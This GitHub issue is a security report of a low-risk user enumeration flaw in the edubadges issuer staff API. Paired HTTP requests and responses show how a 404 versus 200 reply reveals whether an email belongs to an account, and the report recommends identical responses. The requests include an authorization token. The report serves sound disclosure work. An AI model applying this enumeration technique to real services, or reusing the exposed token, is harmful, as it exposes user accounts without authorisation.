This repository has been archived by the owner on Oct 21, 2022. It is now read-only.

User Enumeration using the issuer manage staff functionality #8

Open
sveeke opened this issue Jun 18, 2018 · 1 comment
Labels
bug-infoleak risk-low Security issues with a low impact
Milestone

Comments

@sveeke
Contributor

sveeke commented Jun 18, 2018

When adding a new staff member to an issuer, the response allows one to determine whether a user exists or not.

@sveeke
Contributor Author

sveeke commented Jun 18, 2018

threatLevel="Low" type="Account Enumeration"

When adding a new staff member to an issuer, the response allows one to determine whether a user exists or not.


Non-existing user:

POST /v1/issuer/issuers/efOVSBKyQzqMrY5IPaHSiQ/staff HTTP/1.1
Host: badgr-dev2.edubadges.nl
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Token 5a29a471f3b21be11928361f5c42aeabf0c5cd8f
Content-Type: application/json
Referer: https://surf-dev2.edubadges.nl/issuer/issuers/efOVSBKyQzqMrY5IPaHSiQ/staff
Content-Length: 79
Origin: https://surf-dev2.edubadges.nl
Connection: close

{"action":"add","email":"[email protected]","role":"owner"}

HTTP/1.1 404 Not Found
Server: nginx/1.12.2
Date: Sun, 10 Jun 2018 01:48:53 GMT
Content-Type: application/json
Connection: close
Vary: Accept, Authorization, Cookie
X-Frame-Options: ALLOW-FROM HTTP://CANVAS.EDUBADGES.NL/, HTTPS://CANVAS.EDUBADGES.NL
Access-Control-Allow-Origin: *
Allow: GET, POST, HEAD, OPTIONS
Content-Length: 76

"User not found. Email must be verified and correspond to an existing user."

Existing user:

POST /v1/issuer/issuers/efOVSBKyQzqMrY5IPaHSiQ/staff HTTP/1.1
Host: badgr-dev2.edubadges.nl
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Token 5a29a471f3b21be11928361f5c42aeabf0c5cd8f
Content-Type: application/json
Referer: https://surf-dev2.edubadges.nl/issuer/issuers/efOVSBKyQzqMrY5IPaHSiQ/staff
Content-Length: 79
Origin: https://surf-dev2.edubadges.nl
Connection: close

{"action":"add","email":"[email protected]","role":"owner"}

HTTP/1.1 200 OK
Server: nginx/1.12.2
Date: Sun, 10 Jun 2018 01:49:10 GMT
Content-Type: application/json
Connection: close
Vary: Accept, Authorization, Cookie
X-Frame-Options: ALLOW-FROM HTTP://CANVAS.EDUBADGES.NL/, HTTPS://CANVAS.EDUBADGES.NL
Access-Control-Allow-Origin: *
Allow: GET, POST, HEAD, OPTIONS
Content-Length: 149

{"user":{"first_name":"Stefan","last_name":"Pentest","email":"[email protected]","slug":"OhBbDf5TQ-mc1ARkS6gOwA"},"role":"owner"}

Impact:
Existing user accounts can be enumerated by guessing email addresses.

Recommendation:
Ensure the responses for existing and non-existing users match exactly so that attackers cannot differentiate.

@sveeke sveeke added this to the Pilot 2018 milestone Jun 18, 2018
@sveeke sveeke added risk-low Security issues with a low impact bug-infoleak labels Jun 18, 2018